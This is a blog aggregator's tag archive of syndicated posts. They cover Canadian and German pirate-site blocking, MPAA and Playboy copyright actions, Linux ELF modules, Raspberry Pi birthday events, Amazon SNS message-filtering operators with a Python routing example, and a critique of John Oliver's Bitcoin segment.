Tag Archives: LTE

Canadian Pirate Site Blocking Plan Triggers Thousands of Responses

Post Syndicated from Ernesto original https://torrentfreak.com/canadian-pirate-site-blocking-plan-triggers-thousands-of-responses-180317/

In January, a coalition of Canadian companies called on the country’s telecom regulator CRTC to establish a local pirate site blocking program, which would be the first of its kind in North America.

The Canadian deal is supported by Fairplay Canada, a coalition of both copyright holders and major players in the telco industry, such as Bell and Rogers, which also have media companies of their own.

Before making a decision on the proposal, the CRTC has launched a public consultation asking Canadians for their opinion on the matter. In recent weeks this has resulted in thousands of submissions, with the majority coming from ordinary citizens.

The responses themselves range from an unequivocal “another push by Bell to control all forms of communication,” to very elaborate and rather well-documented arguments.

From the responses we’ve seen it’s clear that many individuals are worried that their Internet access will be censored. The term “slippery slope” is regularly mentioned, as well as the corporate interests that back the plan.

“I strongly oppose any attempt for internet censorship, especially any attempt brought forth by a commercial entity. The internet is and should remain a free flowing source of information that is not controlled by any individuals or groups political or corporate interests,” Shanon Durst writes in her comment.

“If there is concern for illegal activities taking place on the internet then those activities can be addressed in a court of law and the appropriate actions taken there,” she adds.

The same type of arguments also come back in the Electronic Frontier Foundation’s (EFF) submission.

“It is unsurprising that the entertainment industry would rather construct its own private body to bypass the court system in making decisions about website blocking,” the EFF writes.

“But if it is allowed to do this, will the newspaper industry be next to propose and fund a private body to make determinations about defamation? Will the adult entertainment industry propose establishing its own private court to determine the boundaries of the law of obscenity?”

While they appear to be in the minority, there are several commenters who back the proposal. Where most individual responses oppose the plans, it appears that many submissions from organizations are in favor.

A lot of these responses come from outfits that are concerned that piracy is negatively impacting their livelihoods, including Canada Basketball, The Association of Canadian Publishers, and Pier 21 Films.

“Canada’s current tools to combat piracy are not working. The FairPlay proposal is a proportionate response that reflects the modern realities of piracy,” Laszlo Barna, president of Pier 21 Films writes.

“As participants in the legal sports and entertainment market in Canada, this proposal will reduce the theft of content and support the ability to invest in, produce, and distribute the great content that our fans crave,” Canada Basketball concurs.

Drawing conclusions based on this limited sample of comments is hard, aside from the finding that it will be impossible to please everyone. Thankfully, research conducted by Reza Rajabiun and Fenwick McKelvey, with support from the Social Sciences and Humanities Research Council of Canada, provides additional insight.

The visualization below gives an overview of the most statistically significant concepts emphasized by respondents in their submissions, as well as the relationship among these concepts.

A visualization of significant comment concepts (image credit)

The quantitative content analysis is based on 4,000 submissions. While it requires some interpretation from the reader, many of the themes appear to be closely aligned with the opposition, the researchers write.

“According to their CRTC submissions, Canadians believe that the proposal is a ‘bad’ ‘idea’ because it enables ‘corporations’ and the ‘government’ to restrict ‘freedom’ of ‘speech’ and ‘flow’ of ‘information’ among ‘citizens.’ The fear of setting a bad ‘precedent’ is closely associated with the potential for ‘censorship’ in the future.”

Many of the same words can also be used in a different context, of course, but the researchers see the themes as evidence that many members of the public are concerned about the negative consequences.

“Overall, it is easy to see that Canadians tend to view the proposed blocking regime not just in terms of its benefits for fighting ‘piracy’; they also perceive that setting up a national blocking regime may be a threat to their economic interests as ‘consumers’ of ‘legitimate’ ‘media’ and of their political ‘rights’ as ‘citizens’,” they write.

At the time of writing nearly 8,000 responses have been submitted. There is no easy way to determine what percentage is for or against the proposal. When the deadline passes on March 29, CRTC will review them manually.

When that’s done, it is up to the telecoms regulator to factor the different opinions into its final decision, which won’t be an easy feat.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN reviews, discounts, offers and coupons.

Vodafone Appeals Decision Forcing it to Block Pirate Streaming Site Kinox

Post Syndicated from Andy original https://torrentfreak.com/vodafone-appeals-decision-forcing-it-to-block-pirate-streaming-site-kinox-180317/

Streaming site Kinox has proven hugely problematic for German authorities and international rightsholders for many years.

Last year, following a three-year manhunt, one of the site’s alleged operators was detained in Kosovo. Despite this and other actions, the site remains online.

Given the profile of the platform and its popularity in Germany, it came as no surprise when Kinox became the guinea pig for site-blocking in the country. Last month following a complaint from local film production and distribution company Constantin Film, a district court in Munich handed down a provisional injunction against Internet provider Vodafone.

In common with many similar cases across the EU, the Court cited a 2017 ruling from the European Court of Justice which found that local authorities can indeed order blockades of copyright-infringing sites. The Court ordered Vodafone to prevent its subscribers from accessing the site and shortly after the provider complied, but not willingly it seems.

According to local news outlet Golem, last week Vodafone filed an appeal arguing that there is no legal basis in Germany for ordering the blockade.

“As an access provider, Vodafone provides only neutral access to the Internet, and we believe that under current law, Vodafone cannot be required to curb copyright infringement on the Internet,” a Vodafone spokesperson told the publication.

The ISP says that not only does the blocking injunction impact its business operations and network infrastructure, it also violates the rights of its customers. Vodafone believes that blocking measures can only be put in place with an explicit legal basis and argues that no such basis exists under German law.

Noting that blockades are easily bypassed by determined users, the ISP says that such measures can also block lots of legal content, making the whole process ineffective.

“[I]nternet blocking generally runs the risk of blocking non-infringing content, so we do not see it as an effective way to make accessing illegal offers more difficult,” Vodafone’s spokesperson said.

Indeed, it appears that the Kinox blockade is a simple DNS-only effort, which means that people can bypass it by simply changing to an alternative DNS provider such as Google DNS or OpenDNS.

Given all of the above, Vodafone is demanding clarification of the earlier decision from a higher court. Whether or not the final decision will go in the ISP’s favor isn’t clear but there is plenty of case law at the European level that suggests the balance of probabilities lies with Constantin Film.

When asked to balance consumer rights versus copyrights, courts have tended to side with the latter in recent years.


MPAA Brands 123Movies as the World’s Most Popular Illegal Site

Post Syndicated from Ernesto original https://torrentfreak.com/mpaa-brands-123movies-as-the-worlds-most-popular-illegal-site-180316/

With millions of visitors per day, pirate streaming site 123movies, also known as GoMovies, is a force to be reckoned with.

The Motion Picture Association of America (MPAA) is fully aware of this and previously alerted the US Trade Representative about this “notorious market.”

However, since the site is not operating from the US, Hollywood’s industry group is also reaching out to 123movies’ alleged home turf, Vietnam. Following in the footsteps of the US ambassador, the MPAA seeks assistance from local authorities.

The MPAA is currently in Vietnam where it’s working with the Office of the Police Investigation Agency to combat pirate sites. According to the MPAA’s Executive Vice President & Chief of Global Content Protection, Jan van Voorn, 123movies is one of the prime targets.

“Right now, the most popular illegal site in the world, 123movies.to (at this point), is operated from Vietnam, and has 98 million visitors a month,” Van Voorn said, quoted by VNExpress.

“There are more services like this – sites that are not helpful for local legitimate businesses,” he adds.

The MPAA hopes that the Vietnamese authorities will step in to take these pirate sites offline, so that legal alternatives can grow. In addition, it stresses that the public should be properly educated, to change their views on movie piracy.

While it’s clear that 123movies is a threat to Hollywood, there are bigger fish out there.

The 98 million number MPAA mentions appears to come from SimilarWeb’s January estimate. While this is a lot of traffic indeed, it’s not the largest pirate site. The Pirate Bay, for example, had an estimated 282 million visitors during the same period.

TorrentFreak asked the MPAA to confirm the claim but at the time of writing, we have yet to hear back. Perhaps Van Voorn was referring to streaming sites specifically, which would make more sense.

In any case, it’s clear that Hollywood is concerned about 123movies and similar sites and will do everything in its power to get them offline.


[$] Designing ELF modules

Post Syndicated from corbet original https://lwn.net/Articles/749108/rss

The bpfilter proposal posted in February
included a new type of kernel module that would run as a user-space
program; its purpose is to parse and translate iptables rules under the
kernel’s control but in a contained, non-kernel setting. These “ELF
modules” were reposted for review as a standalone
patch set in early March. That review has happened; it is a
good example of how community involvement can improve a special-purpose
patch and turn it into a more generally useful feature.

Playboy Wants to Know Who Downloaded Their Playmate Images From Imgur

Post Syndicated from Ernesto original https://torrentfreak.com/playboy-wants-know-downloaded-pirated-playmates-imgur-180313/

Late last year Playboy filed a copyright lawsuit against the popular blog Boing Boing.

The site had previously published an article linking to an archive of Playboy centerfold images, which the adult magazine saw as problematic.

Boing Boing’s parent company Happy Mutants was accused of various counts of copyright infringement, with Playboy claiming that it exploited their playmates’ images for commercial purposes.

The California district court was not convinced, however. In an order last month, Judge Fernando Olguin noted that it is not sufficient to argue that Boing Boing merely ‘provided the means’ to carry out copyright-infringing activity. There also has to be a personal action that ‘assists’ the infringing activity.

“For example, the court is skeptical that plaintiff has sufficiently alleged facts to support either its inducement or material contribution theories of copyright infringement,” Judge Olguin wrote.

Playboy was given the option to file a new complaint before the end of February, or else the case would be dismissed. The magazine publisher decided to let the matter go, for now, and didn’t file a new complaint.

That doesn’t mean that they’ll completely pass on the issue though. Instead of only going after Boing Boing, Playboy is now digging up information on the people who posted the infringing content on Imgur and YouTube.

Last week the California Court asked why Playboy hadn’t responded after the latest order. The company replied that it thought no response was needed and that the case would be dismissed automatically, but it included another interesting note.

“Plaintiff has elected to pursue third party subpoenas under, inter alia, the Digital Millennium Copyright Act Section 512(h) in order to obtain further facts before determining how to proceed on its claims against Happy Mutants,” Playboy writes.

Looking through the court dockets, we observed that Playboy requested DMCA subpoenas against both Imgur and YouTube. In both cases, the company demands information that can identify the uploaders, including email addresses, phone numbers, and other documents or information.

With Imgur, it goes even further. Here, Playboy also requests information on people “who downloaded any photos” from the Imgur gallery in question. That could be quite a long list as anyone would have to download the images in order to see them. This could include millions of people.

Playboy subpoena against Imgur

A broad request like this goes further than we’ve ever seen. However, soon after the requests came in, the clerk granted both subpoenas.

At this point, it’s unclear whether Playboy also intends to go after the uploaders directly. It informed the California District Court that these “further facts” will help to determine whether it will pursue its claims against Boing Boing, which means that it must file a new complaint.

It’s worth mentioning, however, that the subpoenas were obtained early last month before the case was dismissed.

Alternatively, Playboy can pursue the Imgur and YouTube uploaders directly, which is more likely to succeed than the infringement claims against Boing Boing. That’s only an option if Imgur and YouTube have sufficient information to identify the infringers in question, of course.

The allegedly infringing centerfold video is no longer listed on YouTube. The Imgur gallery, which was viewed more than two million times, is no longer available either.


Playboy’s latest filing mentioning the DMCA subpoenas can be found here (pdf). We also obtained copies of the YouTube (pdf + attachment) and Imgur (pdf + attachment) subpoenas themselves.


Raspberry Jam Big Birthday Weekend 2018 roundup

Post Syndicated from Ben Nuttall original https://www.raspberrypi.org/blog/big-birthday-weekend-2018-roundup/

A couple of weekends ago, we celebrated our sixth birthday by coordinating more than 100 simultaneous Raspberry Jam events around the world. The Big Birthday Weekend was a huge success: our fantastic community organised Jams in 40 countries, covering six continents!

We sent the Jams special birthday kits to help them celebrate in style, and a video message featuring a thank you from Philip and Eben:

Raspberry Jam Big Birthday Weekend 2018

To celebrate the Raspberry Pi’s sixth birthday, we coordinated Raspberry Jams all over the world to take place over the Raspberry Jam Big Birthday Weekend, 3-4 March 2018. A massive thank you to everyone who ran an event and attended.

The Raspberry Jam photo booth

I put together code for a Pi-powered photo booth which overlaid the Big Birthday Weekend logo onto photos and (optionally) tweeted them. We included an arcade button in the Jam kits so they could build one — and it seemed to be quite popular. Some Jams put great effort into housing their photo booth:

Here are some of my favourite photo booth tweets:

RGVSA on Twitter

PiParty photo booth @RGVSA & @ @Nerdvana_io #Rjam

Denis Stretton on Twitter

The @SouthendRPIJams #PiParty photo booth

rpijamtokyo on Twitter

PiParty photo booth

Preston Raspberry Jam on Twitter

Preston Raspberry Jam Photobooth #RJam #PiParty

If you want to try out the photo booth software yourself, find the code on GitHub.

The great Raspberry Jam bake-off

Traditionally, in the UK, people have a cake on their birthday. And we had a few! We saw (and tasted) a great selection of Pi-themed cakes and other baked goods throughout the weekend:

Raspberry Jams everywhere

We always say that every Jam is different, but there’s a common and recognisable theme amongst them. It was great to see so many different venues around the world filling up with like-minded Pi enthusiasts, Raspberry Jam–branded banners, and Raspberry Pi balloons!


Sergio Martinez on Twitter

Thank you so much to all the attendees of the Ikana Jam in Krakow past Saturday! We shared fun experiences, some of them… also painful 😉 A big thank you to @Raspberry_Pi for these global celebrations! And a big thank you to @hubraum for their hospitality! #PiParty #rjam

NI Raspberry Jam on Twitter

We also had a super successful set of wearables workshops using @adafruit Circuit Playground Express boards and conductive thread at today’s @Raspberry_Pi Jam! Very popular! #PiParty

Suzystar on Twitter

My SenseHAT workshop, going well! @SouthendRPiJams #PiParty

Worksop College Raspberry Jam on Twitter

Learning how to scare the zombies in case of an apocalypse- it worked on our young learners #PiParty @worksopcollege @Raspberry_Pi https://t.co/pntEm57TJl


Rita on Twitter

Being one of the two places in Kenya where the #PiParty took place, it was an amazing time spending the day with this team and getting to learn and have fun. @TaitaTavetaUni and @Raspberry_Pi thank you for your support. @TTUTechlady @mictecttu ch




@GABONIAVERACITY #PiParty Lagos Raspberry Jam 2018 Special International Celebration – 6th Raspberry-Pi Big Birthday! Lagos Nigeria @Raspberry_Pi @ben_nuttall #RJam #RaspberryJam #raspberrypi #physicalcomputing #robotics #edtech #coding #programming #edTechAfrica #veracityhouse https://t.co/V7yLxaYGNx

North America

Heidi Baynes on Twitter

The Riverside Raspberry Jam @Vocademy is underway! #piparty

Brad Derstine on Twitter

The Philly & Pi #PiParty event with @Bresslergroup and @TechGirlzorg was awesome! The Scratch and Pi workshop was amazing! It was overall a great day of fun and tech!!! Thank you everyone who came out!

Houston Raspi on Twitter

Thanks everyone who came out to the @Raspberry_Pi Big Birthday Jam! Special thanks to @PBFerrell @estefanniegg @pcsforme @pandafulmanda @colnels @bquentin3 couldn’t’ve put on this amazing community event without you guys!

Merge Robotics 2706 on Twitter

We are back at @SciTechMuseum for the second day of @OttawaPiJam! Our robot Mergius loves playing catch with the kids! #pijam #piparty #omgrobots

South America

Javier Garzón on Twitter

This is how we wrapped up the #Raspberry Jam Big Birthday Weekend #Bogota 2018 #PiParty by #RaspberryJamBogota 2018 @Raspberry_Pi See you on March 7 at #ArduinoDayBogota 2018 and #RaspberryJamBogota 2018


Fablab UP Cebu on Twitter

Happy 6th birthday, @Raspberry_Pi! Greetings all the way from CEBU,PH! #PiParty #IoTCebu Thanks @CebuXGeeks X Ramos for these awesome pics. #Fablab #UPCebu

福野泰介 on Twitter

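The Raspberry Pi 6th birthday party has started in Tokyo. At the PCN booth we have various exhibits and are running a mini kids' IoT hackathon experience connecting https://t.co/L6E7KgyNHF and IchigoJam, near Kamata Station in Tokyo https://t.co/yHEuqXHvqe #piparty #pipartytokyo #rjam #opendataday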

Ren Camp on Twitter

Happy birthday @Raspberry_Pi! #piparty #iotcebu @coolnumber9 https://t.co/2ESVjfRJ2d


Glenunga Raspberry Pi Club on Twitter

PiParty photo booth

Personally, I managed to get to three Jams over the weekend: two run by the same people who put on the first two Jams to ever take place, and also one brand-new one! The Preston Raspberry Jam team, who usually run their event on a Monday evening, wanted to do something extra special for the birthday, so they came up with the idea of putting on a Raspberry Jam Sandwich — on the Friday and Monday around the weekend! This meant I was able to visit them on Friday, then attend the Manchester Raspberry Jam on Saturday, and finally drop by the new Jam at Worksop College on my way home on Sunday.

Ben Nuttall on Twitter

I’m at my first Raspberry Jam #PiParty event of the big birthday weekend! @PrestonRJam has been running for nearly 6 years and is a great place to start the celebrations!

Ben Nuttall on Twitter

Back at @McrRaspJam at @DigInnMMU for #PiParty

Ben Nuttall on Twitter

Great to see mine & @Frans_facts Balloon Pi-Tay popper project in action at @worksopjam #rjam #PiParty https://t.co/GswFm0UuPg

Various members of the Foundation team attended Jams around the UK and US, and James from the Code Club International team visited AmsterJam.

hackerfemo on Twitter

Thanks to everyone who came to our Jam and everyone who helped out. @phoenixtogether thanks for amazing cake & hosting. Ademir you’re so cool. It was awesome to meet Craig Morley from @Raspberry_Pi too. #PiParty

Stuart Fox on Twitter

Great #PiParty today at the @cotswoldjam with bloody delicious cake and lots of raspberry goodness. Great to see @ClareSutcliffe @martinohanlon playing on my new pi powered arcade build:-)

Clare Sutcliffe on Twitter

Happy 6th Birthday @Raspberry_Pi from everyone at the #PiParty at #cotswoldjam in Cheltenham!

Code Club on Twitter

It’s @Raspberry_Pi 6th birthday and we’re celebrating by taking part in @amsterjam__! Happy Birthday Raspberry Pi, we’re so happy to be a part of the family! #PiParty

For more Jammy birthday goodness, check out the PiParty hashtag on Twitter!

The Jam makers!

A lot of preparation went into each Jam, and we really appreciate all the hard work the Jam makers put in to making these events happen, on the Big Birthday Weekend and all year round. Thanks also to all the teams that sent us a group photo:

Lots of the Jams that took place were brand-new events, so we hope to see them continue throughout 2018 and beyond, growing the Raspberry Pi community around the world and giving more people, particularly youths, the opportunity to learn digital making skills.

Philip Colligan on Twitter

So many wonderful people in the @Raspberry_Pi community. Thanks to everyone at #PottonPiAndPints for a great afternoon and for everything you do to help young people learn digital making. #PiParty

Special thanks to ModMyPi for shipping the special Raspberry Jam kits all over the world!

Don’t forget to check out our Jam page to find an event near you! This is also where you can find free resources to help you get a new Jam started, and download free starter projects made especially for Jam activities. These projects are available in English, Français, Français Canadien, Nederlands, Deutsch, Italiano, and 日本語. If you’d like to help us translate more content into these and other languages, please get in touch!

PS Some of the UK Jams were postponed due to heavy snowfall, so you may find there’s a belated sixth-birthday Jam coming up where you live!

S Organ on Twitter

@TheMagP1 Ours was rescheduled until later in the Spring due to the snow but here is Babbage enjoying the snow!

The post Raspberry Jam Big Birthday Weekend 2018 roundup appeared first on Raspberry Pi.

Message Filtering Operators for Numeric Matching, Prefix Matching, and Blacklisting in Amazon SNS

Post Syndicated from Christie Gifrin original https://aws.amazon.com/blogs/compute/message-filtering-operators-for-numeric-matching-prefix-matching-and-blacklisting-in-amazon-sns/

This blog was contributed by Otavio Ferreira, Software Development Manager for Amazon SNS

Message filtering simplifies the overall pub/sub messaging architecture by offloading message filtering logic from subscribers, as well as message routing logic from publishers. The initial launch of message filtering provided a basic operator that was based on exact string comparison. For more information, see Simplify Your Pub/Sub Messaging with Amazon SNS Message Filtering.

Today, AWS is announcing an additional set of filtering operators that bring even more power and flexibility to your pub/sub messaging use cases.

Message filtering operators

Amazon SNS now supports both numeric and string matching. Specifically, string matching operators allow for exact, prefix, and “anything-but” comparisons, while numeric matching operators allow for exact and range comparisons, as outlined below. Numeric matching operators work for values between -10e9 and +10e9 inclusive, with five digits of accuracy right of the decimal point.

  • Exact matching on string values (Whitelisting): Subscription filter policy {"sport": ["rugby"]} matches message attribute {"sport": "rugby"} only.
  • Anything-but matching on string values (Blacklisting): Subscription filter policy {"sport": [{"anything-but": "rugby"}]} matches message attributes such as {"sport": "baseball"} and {"sport": "basketball"} and {"sport": "football"} but not {"sport": "rugby"}.
  • Prefix matching on string values: Subscription filter policy {"sport": [{"prefix": "bas"}]} matches message attributes such as {"sport": "baseball"} and {"sport": "basketball"}.
  • Exact matching on numeric values: Subscription filter policy {"balance": [{"numeric": ["=", 301.5]}]} matches message attributes {"balance": 301.500} and {"balance": 3.015e2}.
  • Range matching on numeric values: Subscription filter policy {"balance": [{"numeric": ["<", 0]}]} matches negative numbers only, and {"balance": [{"numeric": [">", 0, "<=", 150]}]} matches any positive number up to 150.

As usual, you may apply the “AND” logic by appending multiple keys in the subscription filter policy, and the “OR” logic by appending multiple values for the same key, as follows:

  • AND logic: Subscription filter policy {"sport": ["rugby"], "language": ["English"]} matches only messages that carry both attributes {"sport": "rugby"} and {"language": "English"}.
  • OR logic: Subscription filter policy {"sport": ["rugby", "football"]} matches messages that carry either the attribute {"sport": "rugby"} or {"sport": "football"}.

Message filtering operators in action

Here’s how this new set of filtering operators works. The following example is based on a pharmaceutical company that develops, produces, and markets a variety of prescription drugs, with research labs located in Asia Pacific and Europe. The company built an internal procurement system to manage the purchasing of lab supplies (for example, chemicals and utensils), office supplies (for example, paper, folders, and markers) and tech supplies (for example, laptops, monitors, and printers) from global suppliers.

This distributed system is composed of the four following subsystems:

  • A requisition system that presents the catalog of products from suppliers, and takes orders from buyers
  • An approval system for orders targeted to Asia Pacific labs
  • Another approval system for orders targeted to European labs
  • A fulfillment system that integrates with shipping partners

As shown in the following diagram, the company leverages AWS messaging services to integrate these distributed systems.

  • Firstly, an SNS topic named “Orders” was created to take all orders placed by buyers on the requisition system.
  • Secondly, two Amazon SQS queues, named “Lab-Orders-AP” and “Lab-Orders-EU” (for Asia Pacific and Europe respectively), were created to backlog orders that are up for review on the approval systems.
  • Lastly, an SQS queue named “Common-Orders” was created to backlog orders that aren’t related to lab supplies, which can already be picked up by shipping partners on the fulfillment system.

The company also uses AWS Lambda functions to automatically process lab supply orders that don’t require approval or which are invalid.

In this example, because different types of orders have been published to the SNS topic, the subscribing endpoints have had to set advanced filter policies on their SNS subscriptions, to have SNS automatically filter out orders they can’t deal with.

As depicted in the above diagram, the following five filter policies have been created:

  • The SNS subscription that points to the SQS queue “Lab-Orders-AP” sets a filter policy that matches lab supply orders, with a total value greater than $1,000, and that target Asia Pacific labs only. These more expensive transactions require an approver to review orders placed by buyers.
  • The SNS subscription that points to the SQS queue “Lab-Orders-EU” sets a filter policy that matches lab supply orders, also with a total value greater than $1,000, but that target European labs instead.
  • The SNS subscription that points to the Lambda function “Lab-Preapproved” sets a filter policy that only matches lab supply orders that aren’t as expensive, up to $1,000, regardless of their target lab location. These orders simply don’t require approval and can be automatically processed.
  • The SNS subscription that points to the Lambda function “Lab-Cancelled” sets a filter policy that only matches lab supply orders with total value of $0 (zero), regardless of their target lab location. These orders carry no actual items, obviously need neither approval nor fulfillment, and as such can be automatically canceled.
  • The SNS subscription that points to the SQS queue “Common-Orders” sets a filter policy that blacklists lab supply orders. Hence, this policy matches only office and tech supply orders, which have a more streamlined fulfillment process, and require no approval, regardless of price or target location.

After the company finished building this advanced pub/sub architecture, they were then able to launch their internal procurement system and allow buyers to begin placing orders. The diagram above shows six example orders published to the SNS topic. Each order contains message attributes that describe the order, and cause them to be filtered in a different manner, as follows:

  • Message #1 is a lab supply order, with a total value of $15,700 and targeting a research lab in Singapore. Because the value is greater than $1,000, and the location “Asia-Pacific-Southeast” matches the prefix “Asia-Pacific-”, this message matches the first SNS subscription and is delivered to SQS queue “Lab-Orders-AP”.
  • Message #2 is a lab supply order, with a total value of $1,833 and targeting a research lab in Ireland. Because the value is greater than $1,000, and the location “Europe-West” matches the prefix “Europe-”, this message matches the second SNS subscription and is delivered to SQS queue “Lab-Orders-EU”.
  • Message #3 is a lab supply order, with a total value of $415. Because the value is greater than $0 and less than $1,000, this message matches the third SNS subscription and is delivered to Lambda function “Lab-Preapproved”.
  • Message #4 is a lab supply order, but with a total value of $0. Therefore, it only matches the fourth SNS subscription, and is delivered to Lambda function “Lab-Cancelled”.
  • Messages #5 and #6 aren’t actually lab supply orders; one is an office supply order, and the other is a tech supply order. Therefore, they only match the fifth SNS subscription, and are both delivered to SQS queue “Common-Orders”.

Although each message only matched a single subscription, each was tested against the filter policy of every subscription in the topic. Hence, depending on which attributes are set on the incoming message, the message might actually match multiple subscriptions, and multiple deliveries will take place. Also, it is important to bear in mind that subscriptions with no filter policies catch every single message published to the topic, as a blank filter policy equates to a catch-all behavior.
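The routing walked through above can be reproduced locally. The following is an added example, not code from the original post or from AWS: a small Python model of the filter-policy semantics this post describes, run over the six orders. The attribute names (request, value, location), the five policy documents, and the order details the text does not give (locations for messages #3 to #6, values for #5 and #6) are assumptions, since the original diagram is not reproduced here.

```python
"""Local model of the SNS filter-policy semantics described in this post.

Added example, not AWS code. Attribute names and policies are assumptions.
"""
import operator

NUMERIC_OPS = {"=": operator.eq, "<": operator.lt, "<=": operator.le,
               ">": operator.gt, ">=": operator.ge}


def numeric_match(conditions, value):
    """Evaluate ["op", n, "op", n, ...]; every (op, n) pair must hold."""
    if isinstance(value, bool) or not isinstance(value, (int, float)):
        return False
    pairs = zip(conditions[0::2], conditions[1::2])
    return all(NUMERIC_OPS[op](value, bound) for op, bound in pairs)


def value_match(rule, value):
    """Test one entry of a policy key's list against one attribute value."""
    if isinstance(rule, dict):
        if "prefix" in rule:
            return isinstance(value, str) and value.startswith(rule["prefix"])
        if "anything-but" in rule:
            return value != rule["anything-but"]
        if "numeric" in rule:
            return numeric_match(rule["numeric"], value)
        raise ValueError(f"unsupported operator: {rule!r}")
    return rule == value  # plain entry: exact match


def matches(policy, attributes):
    """AND across policy keys, OR across the entries listed for each key."""
    for key, rules in policy.items():
        if key not in attributes:
            return False  # the message must carry every key in the policy
        if not any(value_match(rule, attributes[key]) for rule in rules):
            return False
    return True  # an empty policy has nothing to fail on: catch-all


# Assumed policy documents for the five subscriptions described in the text.
SUBSCRIPTIONS = {
    "Lab-Orders-AP": {"request": ["lab"],
                      "value": [{"numeric": [">", 1000]}],
                      "location": [{"prefix": "Asia-Pacific-"}]},
    "Lab-Orders-EU": {"request": ["lab"],
                      "value": [{"numeric": [">", 1000]}],
                      "location": [{"prefix": "Europe-"}]},
    "Lab-Preapproved": {"request": ["lab"],
                        "value": [{"numeric": [">", 0, "<=", 1000]}]},
    "Lab-Cancelled": {"request": ["lab"],
                      "value": [{"numeric": ["=", 0]}]},
    "Common-Orders": {"request": [{"anything-but": "lab"}]},
}

# Constructed sample orders following the six messages in the text.
MESSAGES = {
    1: {"request": "lab", "value": 15700, "location": "Asia-Pacific-Southeast"},
    2: {"request": "lab", "value": 1833, "location": "Europe-West"},
    3: {"request": "lab", "value": 415, "location": "Asia-Pacific-Southeast"},
    4: {"request": "lab", "value": 0, "location": "Europe-West"},
    5: {"request": "office", "value": 250, "location": "Europe-West"},
    6: {"request": "tech", "value": 4200, "location": "Asia-Pacific-Southeast"},
}


def route(attributes, subscriptions=SUBSCRIPTIONS):
    """Return the names of all subscriptions whose policy accepts the message."""
    return sorted(name for name, policy in subscriptions.items()
                  if matches(policy, attributes))


if __name__ == "__main__":
    for number, attrs in MESSAGES.items():
        print(f"message #{number} -> {route(attrs)}")
    # A subscription created without a filter policy receives every order.
    with_unfiltered = {**SUBSCRIPTIONS, "No-Policy": {}}
    for number, attrs in MESSAGES.items():
        print(f"message #{number} -> {route(attrs, with_unfiltered)}")
```

The second loop shows the catch-all behavior in practice: the subscription with an empty policy appears in the delivery list of all six orders, which is worth checking for when a topic carries data that only some subscribers should receive.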


Amazon SNS allows for both string and numeric filtering operators. As explained in this post, string operators allow for exact, prefix, and “anything-but” comparisons, while numeric operators allow for exact and range comparisons. These advanced filtering operators bring even more power and flexibility to your pub/sub messaging functionality and also allow you to simplify your architecture further by removing even more logic from your subscribers.

Message filtering can be implemented easily with existing AWS SDKs by applying message and subscription attributes across all SNS supported protocols (Amazon SQS, AWS Lambda, HTTP, SMS, email, and mobile push). SNS filtering operators for numeric matching, prefix matching, and blacklisting are available now in all AWS Regions, for no extra charge.

To experiment with these new filtering operators yourself, and continue learning, try the 10-minute Tutorial Filter Messages Published to Topics. For more information, see Filtering Messages with Amazon SNS in the SNS documentation.

What John Oliver gets wrong about Bitcoin

Post Syndicated from Robert Graham original http://blog.erratasec.com/2018/03/what-john-oliver-gets-wrong-about.html

John Oliver covered bitcoin/cryptocurrencies last night. I thought I’d describe a bunch of things he gets wrong.

How Bitcoin works

Nowhere in the show does it describe what Bitcoin is and how it works.
Discussions should always start with Satoshi Nakamoto’s original paper. The thing Satoshi points out is that there is an important cost to normal transactions, namely, the entire legal system designed to protect you against fraud, such as the way you can reverse the transactions on your credit card if it gets stolen. The point of Bitcoin is that there is no way to reverse a charge. A transaction is done via cryptography: to transfer money to me, you decrypt it with your secret key and encrypt it with mine, handing ownership over to me with no third party involved that can reverse the transaction, and essentially no overhead.
All the rest of the stuff, like the decentralized blockchain and mining, is all about making that work.
Bitcoin crazies forget about the original genesis of Bitcoin. For example, they talk about adding features to stop fraud, reversing transactions, and having a central authority that manages that. This misses the point, because the existing electronic banking system already does that, and does a better job at it than cryptocurrencies ever can. If you want to mock cryptocurrencies, talk about the “DAO”, which did exactly that — and collapsed in a big fraudulent scheme where insiders made money and outsiders didn’t.
Sticking to Satoshi’s original ideas is a lot better than trying to repeat how the crazy fringe activists define Bitcoin.

How does any money have value?

Oliver’s answer is currencies have value because people agree that they have value, like how they agree a Beanie Baby is worth $15,000.
This is wrong. A better way of asking the question is why the value of money changes. The dollar has been losing roughly 2% of its value each year for decades. This is called “inflation”: as the dollar loses value, it takes more dollars to buy things, which means the price of things (in dollars) goes up, and employers have to pay us more dollars so that we can buy the same amount of things.
The reason the value of the dollar changes is largely because the Federal Reserve manages the supply of dollars, using the same law of Supply and Demand. As you know, if a supply decreases (like oil), then the price goes up, or if the supply of something increases, the price goes down. The Fed manages money the same way: when prices rise (the dollar is worth less), the Fed reduces the supply of dollars, causing it to be worth more. Conversely, if prices fall (or don’t rise fast enough), the Fed increases supply, so that the dollar is worth less.
The reason money follows the law of Supply and Demand is because people use money, they consume it like they do other goods and services, like gasoline, tax preparation, food, dance lessons, and so forth. It’s not like a fine art painting, a stamp collection or a Beanie Baby — money is a product. It’s just that people have a hard time thinking of it as a consumer product since, in their experience, money is what they use to buy consumer products. But it’s a symmetric operation: when you buy gasoline with dollars, you are actually selling dollars in exchange for gasoline. That you call one side in this transaction “money” and the other “goods” is purely arbitrary; you could just as well call gasoline money and dollars the good that is being bought and sold for gasoline.
The reason dollars are a product is because trying to use gasoline as money is a pain in the neck. Storing it and exchanging it is difficult. Goods like this do become money, such as famously how prisons often use cigarettes as a medium of exchange, even for non-smokers, but it has to be a good that is fungible, storable, and easily exchanged. Dollars are the most fungible, the most storable, and the easiest exchanged, so they have the most value as “money”. Sure, the mechanic can fix the farmer’s car for three chickens instead, but most of the time, both parties in the transaction would rather exchange the same value using dollars than chickens.
So the value of dollars is not like the value of Beanie Babies, which people might buy for $15,000, which changes purely on the whims of investors. Instead, a dollar is like gasoline, which obeys the law of Supply and Demand.
This brings us back to the question of where Bitcoin gets its value. While Bitcoin is indeed used like dollars to buy things, that’s only a tiny use of the currency, so therefore its value isn’t determined by Supply and Demand. Instead, the value of Bitcoin is a lot like Beanie Babies, obeying the laws of investments. So in this respect, Oliver is right about where the value of Bitcoin comes from, but wrong about where the value of dollars comes from.

Why Bitcoin conference didn’t take Bitcoin

John Oliver points out the irony of a Bitcoin conference that stopped accepting payments in Bitcoin for tickets.
The biggest reason for this is because Bitcoin has become so popular that transaction fees have gone up. Instead of being proof of failure, it’s proof of popularity. What John Oliver is saying is the old joke that nobody goes to that popular restaurant anymore because it’s too crowded and you can’t get a reservation.
